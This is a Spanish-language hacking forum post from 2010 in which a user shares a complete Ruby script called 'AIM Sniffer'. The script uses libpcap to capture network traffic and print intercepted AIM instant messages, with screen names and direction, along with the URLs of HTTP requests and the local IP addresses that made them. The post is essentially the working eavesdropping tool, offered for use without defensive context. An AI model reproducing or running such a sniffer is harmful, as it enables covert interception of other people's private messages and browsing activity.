comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

AIM Sniffer

  • 0 Respuestas
  • 1239 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Febrero 24, 2010, 04:08:04 pm »
Código: Ruby
  1. #!/usr/bin/env ruby
  2.  
  3. # this line imports the libpcap ruby bindings
  4. require 'pcaplet'
  5.  
  6. # create a sniffer that grabs the first 1500 bytes of each packet
  7. $network = Pcaplet.new('-s 1500')
  8.  
  9. def has_nonprint? n
  10.   # figure out if the string has non-printable characters
  11.   n.each_byte {|x| return false if x < 32 or x > 126}
  12. end
  13.  
  14. def aim_msg_parse p
  15.   # figure out how many text characters are in the screen name
  16.   name_length = p.tcp_data[26..26].unpack("c")
  17.   # extract the screen name from the packet
  18.   name = p.tcp_data[27..(27 + name_length[0])]
  19.   # filter out all other text
  20.   p.tcp_data[85..-1][/<[^>]+>(.*)<\//]
  21.   msg = $1.gsub(/<[^>]+>/,"").strip
  22.  
  23.   # make sure that it is an actual message and then return it
  24.   return [name, msg] if msg and not has_nonprint?(name) and
  25.     name =~ /^[a-zA-Z]/ and not name.include?("/")
  26.  
  27.   # if it isn't really a text message, return nothing
  28.   nil
  29. rescue
  30. end
  31.  
  32. # make a filter to capture all packets sent to port 80 on a remote server
  33. $www_filter = Pcap::Filter.new('tcp and dst port 80', $network.capture)
  34.  
  35. # make a filter to capture all packets sent from port 5190 on a remote server
  36. $aim_recv_filter = Pcap::Filter.new('tcp and src port 5190', $network.capture)
  37.  
  38. # make a filter to capture all packets sent to port 5190 on a remote server
  39. $aim_send_filter = Pcap::Filter.new('tcp and dst port 5190', $network.capture)
  40.  
  41. # add all the filters
  42. $network.add_filter($aim_recv_filter | $aim_send_filter | $www_filter)
  43.  
  44. for p in $network
  45.   # if the packet matches the www filter and the regexp...
  46.   if $www_filter =~ p and p.tcp_data =~ /GET(.*)HTTP.*Host:([^\r\n]*)/xm
  47.     # print the local IP of the requestor and the requested URL
  48.     puts "#{p.src} - http://#{$2.strip}#{$1.strip}"
  49.   # if the packet matches the incoming AIM filter...
  50.   elsif $aim_recv_filter =~ p
  51.     # parse the packet and extract the sn/message
  52.     name, msg = aim_msg_parse p
  53.     # display the local IP, the screen name of the user and the message
  54.     puts "(<-) <#{p.dst}> from #{name}: #{msg}" if name and msg
  55.   # if the packet matches the outgoing AIM filter...
  56.   elsif $aim_send_filter =~ p
  57.     # parse the packet and extract the sn/message
  58.     name, msg = aim_msg_parse p
  59.     # display the local IP, the screen name of the user and the message
  60.     puts "(->) <#{p.src}> to #{name}: #{msg}" if name and msg
  61.   end
  62. end
« Última modificación: Julio 31, 2014, 09:46:21 pm por Expermicid »


 

¿Te gustó el post? COMPARTILO!